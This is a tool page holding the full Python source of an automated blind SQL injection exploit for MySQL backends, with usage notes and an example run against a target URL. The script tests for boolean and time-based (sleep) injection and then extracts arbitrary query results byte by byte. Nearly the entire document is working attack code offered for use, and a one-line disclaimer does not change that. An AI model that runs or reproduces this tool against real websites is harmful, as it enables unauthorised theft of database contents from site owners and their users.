
SQL injection/mysqli-blindutils/sqli-slee.py

This Python script extracts the result of an arbitrary SQL expression from a MySQL backend through blind SQL injection. It first tries a boolean-based oracle (the response length must differ between an always-true and an always-false condition) and falls back to a time-based oracle (`sleep()` must delay the response) when the lengths do not differ. The result is recovered one byte at a time with `ascii(substr(...))` comparisons.

Special thanks to Dilon for this tool.

Info

Main article: Web exploitation tools

The syntax of this script is as follows. The `-u` value is the full target URL up to and including whatever breaks out of the original query (the `%27` in the example below is a URL-encoded single quote); the script appends its own `and ... --+` payloads after it. The `-i` value is the SQL expression whose result should be dumped:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end user is liable for his or her own actions with the use of this software. Running this against a system you do not own, without written authorization from its owner, is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
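def request(URL):
    """Fetch URL with a fixed browser-like User-Agent and return the body length.

    The response length is the only oracle this tool has in boolean mode,
    so every probe goes through this one function: headers stay constant
    between the "true" and "false" requests, which keeps any server-side
    content negotiation from skewing the comparison.

    Args:
        URL: fully assembled request URL with the payload already appended.

    Returns:
        int: number of bytes in the response body.

    On an HTTP error status or a transport failure the process exits with
    status 1 instead of raising (original CLI behaviour).  Note that a
    4xx/5xx provoked by the injected payload itself is therefore fatal to
    the whole run; it is not used as a differential signal.
    """
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)

    try:
        response = urllib2.urlopen(req)

    # HTTPError is a subclass of URLError, so it must be caught first.
    # ``as e`` (not ``, e``) is valid on 2.6+ and 3.x alike.
    except HTTPError as e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)

    except URLError as e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)

    # A dump issues hundreds of probes; close each connection explicitly
    # rather than leaving it to garbage collection.
    try:
        return len(response.read())
    finally:
        response.close()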
 
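def value(URL):
    """Recover one byte of the injected expression's result by bisection.

    URL is the probe prefix built by main(): it ends in an open comparison
    (``... ascii(substr(...))``) that is_what() completes with ``<op><n>``.
    Only the ``>`` comparison is used, so every byte costs exactly eight
    requests.  The original probed ``>``, ``<`` and ``=`` separately (up to
    27 requests per byte) and its interval arithmetic could never settle on
    0 or 255, so the end-of-string byte was only reached by exhausting the
    iteration budget.

    Args:
        URL: probe prefix ending in an open comparison expression.

    Returns:
        str: the recovered character, or the sentinel ``'done'`` when the
        byte is 0 — MySQL's ``ascii('')`` once substr() runs past the end
        of the string — which main() treats as end of data.
    """
    low, high = 0, 255
    # Invariant: the byte lies in [low, high].  Each probe halves the range.
    while low < high:
        mid = (low + high) // 2
        if is_what(URL, mid, '>'):
            low = mid + 1
        else:
            high = mid

    if low == 0:
        return 'done'
    return chr(low)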
 
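def is_what(URL, maybe, op):
    """Ask the target whether ``<result byte> <op> <maybe>`` holds.

    Appends the comparison plus a ``--+`` comment terminator to the probe
    prefix and reads the oracle selected by the global ``sqli_type``:

    * ``'boolean'``: the response length must equal the global
      ``TrueResponse`` measured by vuln_check().  Any drift in page size
      between requests (timestamps, rotating content, CSRF tokens) reads
      as "false".
    * ``'time'``: the injected ``sleep((cond)*2)`` must push the round trip
      over 2 s.  A target whose baseline latency already exceeds 2 s will
      read every probe as "true".

    Args:
        URL: probe prefix ending in an open comparison expression.
        maybe: integer 0-255 the extracted byte is compared against.
        op: ``'>'``, ``'<'`` or ``'='``; appended to the URL unencoded.

    Returns:
        1 when the comparison appears true, 0 otherwise.  Returns None for
        an unknown ``sqli_type`` (vuln_check() only ever yields the two
        modes above).
    """
    if sqli_type == 'boolean':
        length = request(str(URL) + str(op) + str(maybe) + '--+')
        return 1 if length == TrueResponse else 0
    elif sqli_type == 'time':
        started = time.time()
        request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        return 1 if (time.time() - started) > 2 else 0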
 
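def vuln_check(URL):
    """Detect which blind-injection oracle the target exposes.

    Sends ``and 43 like 43`` (always true) and ``and 34 like 43`` (always
    false) and compares the response lengths.  A difference alone is not
    enough: the true payload is sent a second time, and if two identical
    requests already come back with different lengths the page is dynamic
    and a length oracle would only produce garbage, so boolean mode is
    skipped instead of reported.  The fallback is ``and sleep(5)``, which
    must make the request take longer than 5 s.

    Args:
        URL: target URL including the quote/bracket that closes the
             original query (e.g. ``...?id=1%27``).

    Returns:
        ``'boolean'`` or ``'time'``.  Sets the global ``TrueResponse``
        (length of the always-true response) for is_what().

    Exits with status 1 when neither oracle responds.
    """
    print('[+] Checking site...')

    global TrueResponse
    true_payload = URL + '%20AND%2043%20like%2043--+'
    TrueResponse = request(true_payload)
    FalseResponse = request(URL + '%20AND%2034%20like%2043--+')

    if TrueResponse != FalseResponse:
        # Same request twice: if the size already varies, the difference
        # above is noise, not an oracle.
        if request(true_payload) == TrueResponse:
            print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
            return 'boolean'
        print('[!] Response length varies between identical requests; boolean oracle unreliable.')

    start = time.time()
    request(URL + '%20and%20sleep(5)--+')
    elapsed_time = time.time() - start

    if elapsed_time > 5:
        print('[+] Site seems to be vulnerable to time based blind SQL injection.')
        return 'time'

    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
    sys.exit(1)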
 
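def _probe_prefix(url, injection, position, mode):
    """Build the per-byte probe URL that value()/is_what() complete with a comparison.

    Args:
        url: target URL as given on the command line.
        injection: URL-quoted SQL expression being extracted.
        position: 1-based byte index into the expression's result.
        mode: ``'boolean'`` or ``'time'`` as returned by vuln_check().

    Returns:
        str: URL ending in an open ``ascii(substr(...))`` comparison; in
        time mode it is wrapped in ``sleep((select ...``, which is_what()
        closes with ``)*2)``.
    """
    extract = 'ascii(substr((' + injection + ')%20from%20' + str(position) + '%20for%201))'
    if mode == 'boolean':
        return url + '%20and%20' + extract
    if mode == 'time':
        return url + '%20and%20sleep((select%20' + extract
    raise ValueError('unknown injection mode: ' + str(mode))


def main():
    """CLI entry point: parse -u/-i, pick an oracle, dump the expression byte by byte.

    Sets the global ``sqli_type`` read by is_what().  Extraction stops when
    value() returns its ``'done'`` sentinel (a 0 byte, i.e. substr() ran
    past the end of the result).  Each recovered character is echoed as it
    arrives so progress is visible in time-based mode, where a single byte
    can take many seconds.
    """
    print('''
                Auto BSQLi tool for MySQL
                ''')

    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')

    (options, _args) = parser.parse_args()
    if not (options.URL and options.INJECTION):
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)

    URL = options.URL
    # The expression goes into the query string; quote it once here so
    # spaces and parentheses survive the trip.
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))

    global sqli_type
    sqli_type = vuln_check(URL)
    print('[+] Dumping data...')

    found = []
    position = 1
    while True:
        letter = value(_probe_prefix(URL, INJECTION, position, sqli_type))
        if letter == 'done':
            break
        found.append(letter)
        sys.stdout.write(letter)
        sys.stdout.flush()
        position += 1

    if found:
        sys.stdout.write('\n')
        print('[+] Data: ' + ''.join(found))
    else:
        print('[!] No data dumped. Check your injection.')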
 
# Run the CLI only when executed as a script, not when imported.
if __name__ == '__main__':
    main()